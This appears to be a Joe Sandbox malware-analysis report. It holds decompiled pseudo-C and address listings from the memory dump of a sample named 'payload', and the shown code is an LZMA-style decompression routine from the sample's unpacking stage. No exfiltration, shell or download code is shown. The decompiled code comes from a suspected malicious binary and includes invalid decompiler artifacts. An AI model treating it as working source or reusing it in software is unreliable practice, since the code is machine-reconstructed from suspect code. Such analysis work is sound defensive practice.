												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}

0x00000000
0x00406701
0x00406701
0x00406705
0x00406712
0x0040671c
0x00000000
0x00406707
0x00406707
0x00406742
0x00406745
0x00406748
0x0040674b
0x0040674b
0x0040674e
0x00406755
0x0040675a
0x0040663b
0x0040663e
0x004069b0
0x004069b0
0x004069b0
0x004069b3
0x004069b3
0x004069b3
0x004069b9
0x004069bf
0x004069c5
0x004069df
0x004069e2
0x004069e8
0x004069f3
0x004069f5
0x004069c7
0x004069c7
0x004069d6
0x004069da
0x004069da
0x004069ff
0x00000000
0x00000000
0x00406a01
0x00406a05
0x00406bb4
0x00406bca
0x00406bd2
0x00406bd9
0x00406bdb
0x00406be2
0x00406be6
0x00406be6
0x00406a11
0x00406a18
0x00406a20
0x00406a23
0x00406a26
0x00406a26
0x00406a2c
0x00406a2c
0x004061c8
0x004061c8
0x004061c8
0x004061d1
0x00000000
0x00000000
0x004061d7
0x00000000
0x004061e2
0x00000000
0x00000000
0x004061eb
0x004061ee
0x004061f1
0x004061f5
0x00000000
0x00000000
0x004061fb
0x004061fe
0x00406200
0x00406201
0x00406204
0x00406206
0x00406207
0x00406209
0x0040620c
0x00406211
0x00406216
0x0040621f
0x00406232
0x00406235
0x00406241
0x00406269
0x0040626b
0x00406279
0x00406279
0x0040627d
0x00000000
0x00000000
0x00000000
0x00000000
0x0040626d
0x0040626d
0x00406270
0x00406271
0x00406271
0x00000000
0x0040626d
0x00406247
0x0040624c
0x0040624c
0x00406255
0x0040625d
0x00406260
0x00000000
0x00406266
0x00406266
0x00000000
0x00406266
0x00000000
0x00406283
0x00406283
0x00406287
0x00406b33
0x00000000
0x00406b33
0x00406290
0x004062a0
0x004062a3
0x004062a6
0x004062a6
0x004062a6
0x004062a9
0x004062ad
0x00000000
0x00000000
0x004062af
0x004062b5
0x004062df
0x004062e5
0x004062ec
0x00000000
0x004062ec
0x004062bb
0x004062be
0x004062c3
0x004062c3
0x004062ce
0x004062d6
0x004062d9
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040631e
0x00406324
0x00406327
0x00406334
0x0040633c
0x004069b0
0x004069b0
0x00000000
0x00000000
0x004062f3
0x004062f3
0x004062f7
0x00406b42
0x00000000
0x00406b42
0x00406303
0x0040630e
0x0040630e
0x0040630e
0x00406311
0x00406314
0x00406317
0x0040631c
0x00000000
0x00000000
0x00000000
0x00000000
0x004069b3
0x004069b3
0x004069b9
0x004069bf
0x004069c5
0x004069df
0x004069e2
0x004069e8
0x004069f3
0x004069f5
0x004069c7
0x004069c7
0x004069d6
0x004069da
0x004069da
0x004069ff
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406344
0x00406346
0x00406349
0x004063ba
0x004063bd
0x004063c0
0x004063c7
0x004063d1
0x004069b0
0x004069b0
0x004069b0
0x00000000
0x004069b0
0x004069b0
0x0040634b
0x0040634f
0x00406352
0x00406354
0x00406357
0x0040635a
0x0040635c
0x0040635f
0x00406361
0x00406366
0x00406369
0x0040636c
0x00406370
0x00406377
0x0040637a
0x00406381
0x00406385
0x0040638d
0x0040638d
0x0040638d
0x00406387
0x00406387
0x00406387
0x0040637c
0x0040637c
0x0040637c
0x00406391
0x00406394
0x004063b2
0x004063b4
0x00000000
0x00406396
0x00406396
0x00406399
0x0040639c
0x0040639f
0x004063a1
0x004063a1
0x004063a1
0x004063a4
0x004063a7
0x004063a9
0x004063aa
0x004063ad
0x00000000
0x004063ad
0x00000000
0x004065e3
0x004065e7
0x00406605
0x00406608
0x0040660f
0x00406612
0x00406615
0x00406618
0x0040661b
0x0040661e
0x00406620
0x00406627
0x00406628
0x0040662a
0x0040662d
0x00406630
0x00406633
0x00406633
0x00406638
0x00000000
0x00406638
0x004065e9
0x004065ec
0x004065ef
0x004065f9
0x004069b0
0x004069b0
0x004069b0
0x00000000
0x004069b0
0x00000000
0x0040664d
0x00406651
0x00406674
0x00406677
0x0040667a
0x00406684
0x00406653
0x00406653
0x00406656
0x00406659
0x0040665c
0x00406669
0x0040666c
0x0040666c
0x004069b0
0x004069b0
0x004069b0
0x00000000
0x004069b0
0x00000000
0x00406690
0x00406694
0x00000000
0x00000000
0x0040669a
0x0040669e
0x00000000
0x00000000
0x004066a4
0x004066a6
0x004066aa
0x004066aa
0x004066ad
0x004066b1
0x00000000
0x00000000
0x00000000
0x00000000
0x00406728
0x0040672c
0x00406733
0x00406736
0x00406739
0x0040672e
0x0040672e
0x0040672e
0x0040673c
0x0040673f
0x00000000
0x00000000
0x004067e8
0x004067e8
0x004067ec
0x00406b8a
0x00000000
0x00406b8a
0x004067f2
0x004067f5
0x004067f8
0x004067fc
0x004067ff
0x00406805
0x00406807
0x00406807
0x00406807
0x0040680a
0x0040680d
0x00000000
0x00000000
0x004063dd
0x004063dd
0x004063e1
0x00406b4e
0x00000000
0x00406b4e
0x004063e7
0x004063ea
0x004063ed
0x004063f1
0x004063f4
0x004063fa
0x004063fc
0x004063fc
0x004063fc
0x004063ff
0x00406402
0x00406402
0x00406405
0x00406408
0x00000000
0x00000000
0x0040640e
0x00406414
0x00000000
0x00000000
0x0040641a
0x0040641a
0x0040641e
0x00406421
0x00406424
0x00406427
0x0040642a
0x0040642b
0x0040642e
0x00406430
0x00406436
0x00406439
0x0040643c
0x0040643f
0x00406442
0x00406445
0x00406448
0x00406464
0x00406467
0x0040646a
0x0040646d
0x00406474
0x00406478
0x0040647a
0x0040647e
0x0040644a
0x0040644a
0x0040644e
0x00406456
0x0040645b
0x0040645d
0x0040645f
0x0040645f
0x00406481
0x00406488
0x0040648b
0x00000000
0x00406491
0x00000000
0x00406491
0x00000000
0x00406496
0x00406496
0x0040649a
0x00406b5a
0x00000000
0x00406b5a
0x004064a0
0x004064a3
0x004064a6
0x004064aa
0x004064ad
0x004064b3
0x004064b5
0x004064b5
0x004064b5
0x004064b8
0x004064bb
0x004064bb
0x004064bb
0x004064c1
0x00000000
0x00000000
0x004064c3
0x004064c6
0x004064c9
0x004064cc
0x004064cf
0x004064d2
0x004064d5
0x004064d8
0x004064db
0x004064de
0x004064e1
0x004064f9
0x004064fc
0x004064ff
0x00406502
0x00406502
0x00406505
0x00406509
0x0040650b
0x004064e3
0x004064e3
0x004064eb
0x004064f0
0x004064f2
0x004064f4
0x004064f4
0x0040650e
0x00406515
0x00406518
0x00000000
0x0040651a
0x00000000
0x0040651a
0x00406518
0x0040651f
0x0040651f
0x0040651f
0x0040651f
0x00000000
0x00000000
0x0040655a
0x0040655a
0x0040655e
0x00406b66
0x00000000
0x00406b66
0x00406564
0x00406567
0x0040656a
0x0040656e
0x00406571
0x00406577
0x00406579
0x00406579
0x00406579
0x0040657c
0x0040657f
0x0040657f
0x00406585
0x00406523
0x00406523
0x00406526
0x00000000
0x00406526
0x00406587
0x00406587
0x0040658a
0x0040658d
0x00406590
0x00406593
0x00406596
0x00406599
0x0040659c
0x0040659f
0x004065a2
0x004065a5
0x004065bd
0x004065c0
0x004065c3
0x004065c6
0x004065c6
0x004065c9
0x004065cd
0x004065cf
0x004065a7
0x004065a7
0x004065af
0x004065b4
0x004065b6
0x004065b8
0x004065b8
0x004065d2
0x004065d9
0x004065dc
0x00000000
0x004065de
0x00000000
0x004065de
0x00000000
0x0040686b
0x0040686b
0x0040686f
0x00406b96
0x00000000
0x00406b96
0x00406875
0x00406878
0x0040687b
0x0040687f
0x00406882
0x00406888
0x0040688a
0x0040688a
0x0040688a
0x0040688d
0x00000000
0x00000000
0x00000000
0x00000000
0x0040697a
0x0040697e
0x004069a0
0x004069a3
0x004069ad
0x004069b0
0x004069b0
0x004069b0
0x00000000
0x004069b0
0x004069b0
0x00406980
0x00406983
0x00406987
0x0040698a
0x0040698a
0x0040698d
0x00000000
0x00000000
0x00406a37
0x00406a3b
0x00406a59
0x00406a59
0x00406a59
0x00406a60
0x00406a67
0x00406a6e
0x00406a6e
0x00000000
0x00406a6e
0x00406a3d
0x00406a40
0x00406a43
0x00406a46
0x00406a4d
0x00406991
0x00406991
0x00406994
0x00000000
0x00000000
0x00406b28
0x00406b2b
0x00406a2c
0x00000000
0x00000000
0x00406762
0x00406764
0x0040676b
0x0040676c
0x0040676e
0x00406771
0x00000000
0x00000000
0x00406779
0x0040677c
0x0040677f
0x00406781
0x00406783
0x00406783
0x00406784
0x00406787
0x0040678e
0x00406791
0x0040679f
0x00000000
0x00000000
0x00406a75
0x00406a75
0x00406a78
0x00406a7f
0x00000000
0x00000000
0x00406a84
0x00406a84
0x00406a88
0x00406bc0
0x00000000
0x00406bc0
0x00406a8e
0x00406a91
0x00406a94
0x00406a98
0x00406a9b
0x00406aa1
0x00406aa3
0x00406aa3
0x00406aa3
0x00406aa6
0x00406aa9
0x00406aa9
0x00406aa9
0x00406aa9
0x00406aac
0x00406aac
0x00406ab0
0x00406b10
0x00406b13
0x00406b18
0x00406b19
0x00406b1b
0x00406b1d
0x00406b20
0x00406a2c
0x00406a2c
0x00000000
0x00406a32
0x00406a2c
0x00406ab2
0x00406ab8
0x00406abb
0x00406abe
0x00406ac1
0x00406ac4
0x00406ac7
0x00406aca
0x00406acd
0x00406ad0
0x00406ad3
0x00406aec
0x00406aef
0x00406af2
0x00406af5
0x00406af9
0x00406afb
0x00406afb
0x00406afc
0x00406aff
0x00406ad5
0x00406ad5
0x00406add
0x00406ae2
0x00406ae4
0x00406ae7
0x00406ae7
0x00406b02
0x00406b09
0x00000000
0x00406b0b
0x00000000
0x00406b0b
0x00000000
0x004067a7
0x004067aa
0x004067e0
0x00406910
0x00406910
0x00406910
0x00406910
0x00406913
0x00406913
0x00406916
0x00406918
0x00406ba2
0x00000000
0x00406ba2
0x0040691e
0x00406921
0x00000000
0x00000000
0x00406927
0x0040692b
0x0040692e
0x0040692e
0x0040692e
0x00000000
0x0040692e
0x004067ac
0x004067ae
0x004067b0
0x004067b2
0x004067b5
0x004067b6
0x004067b8
0x004067ba
0x004067bd
0x004067c0
0x004067d6
0x004067db
0x00406813
0x00406813
0x00406817
0x00406843
0x00406845
0x0040684c
0x0040684f
0x00406852
0x00406852
0x00406857
0x00406857
0x00406859
0x0040685c
0x00406863
0x00406866
0x00406893
0x00406893
0x00406896
0x00406899
0x0040690d
0x0040690d
0x0040690d
0x00000000
0x0040690d
0x0040689b
0x004068a1
0x004068a4
0x004068a7
0x004068aa
0x004068ad
0x004068b0
0x004068b3
0x004068b6
0x004068b9
0x004068bc
0x004068d5
0x004068d7
0x004068da
0x004068db
0x004068de
0x004068e0
0x004068e3
0x004068e5
0x004068e7
0x004068ea
0x004068ec
0x004068ef
0x004068f3
0x004068f5
0x004068f5
0x004068f6
0x004068f9
0x004068fc
0x004068be
0x004068be
0x004068c6
0x004068cb
0x004068cd
0x004068d0
0x004068d0
0x004068ff
0x00406906
0x00406890
0x00406890
0x00406890
0x00406890
0x00000000
0x00406908
0x00000000
0x00406908
0x00406906
0x00406819
0x0040681c
0x0040681e
0x00406821
0x00406824
0x00406827
0x00406829
0x0040682c
0x0040682f
0x0040682f
0x00406832
0x00406832
0x00406835
0x0040683c
0x00406810
0x00406810
0x00406810
0x00406810
0x00000000
0x0040683e
0x00000000
0x0040683e
0x0040683c
0x004067c2
0x004067c5
0x004067c7
0x004067ca
0x00000000
0x00000000
0x00406529
0x00406529
0x0040652d
0x00406b72
0x00000000
0x00406b72
0x00406533
0x00406536
0x00406539
0x0040653c
0x0040653f
0x00406542
0x00406545
0x00406547
0x0040654a
0x0040654d
0x00406550
0x00406552
0x00406552
0x00406552
0x00000000
0x00000000
0x004066b4
0x004066b4
0x004066b8
0x00406b7e
0x00000000
0x00406b7e
0x004066be
0x004066c1
0x004066c4
0x004066c7
0x004066c9
0x004066c9
0x004066c9
0x004066cc
0x004066cf
0x004066d2
0x004066d5
0x004066d8
0x004066db
0x004066dc
0x004066de
0x004066de
0x004066de
0x004066e1
0x004066e4
0x004066e7
0x004066ea
0x004066ea
0x004066ea
0x004066ed
0x004066ef
0x004066ef
0x00000000
0x00000000
0x00406931
0x00406931
0x00406931
0x00406935
0x00000000
0x00000000
0x0040693b
0x0040693e
0x00406941
0x00406944
0x00406946
0x00406946
0x00406946
0x00406949
0x0040694c
0x0040694f
0x00406952
0x00406955
0x00406958
0x00406959
0x0040695b
0x0040695b
0x0040695b
0x0040695e
0x00406961
0x00406964
0x00406967
0x0040696a
0x0040696e
0x00406970
0x00406973
0x00000000
0x00406975
0x004066f2
0x004066f2
0x00000000
0x004066f2
0x00406973
0x00406ba8
0x00000000
0x00000000
0x004061d7
0x00406bdf
0x00406bdf
0x00000000
0x00406bdf
0x00406a2c
0x004069b3
0x004069b0
0x00000000
0x00406705

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83d4d9fa97144311a3e66a470cde7927608ab55fe6dc8c436fded4a10c430ead
Instruction ID: 2ec41c1936be718984cf19d05ce660ecedc56656b80368bbb2ce29215557a5c8
Opcode Fuzzy Hash: 83d4d9fa97144311a3e66a470cde7927608ab55fe6dc8c436fded4a10c430ead
Instruction Fuzzy Hash: 53712571E04228CBDF28CF98C854BADBBB1FB44305F15816ED856BB281C7785996DF44

Uniqueness

Uniqueness Score: -1.00%

Function 0040664D Relevance: 5.2, APIs: 4, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E0040664D() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00406BE7))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8)); // executed
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
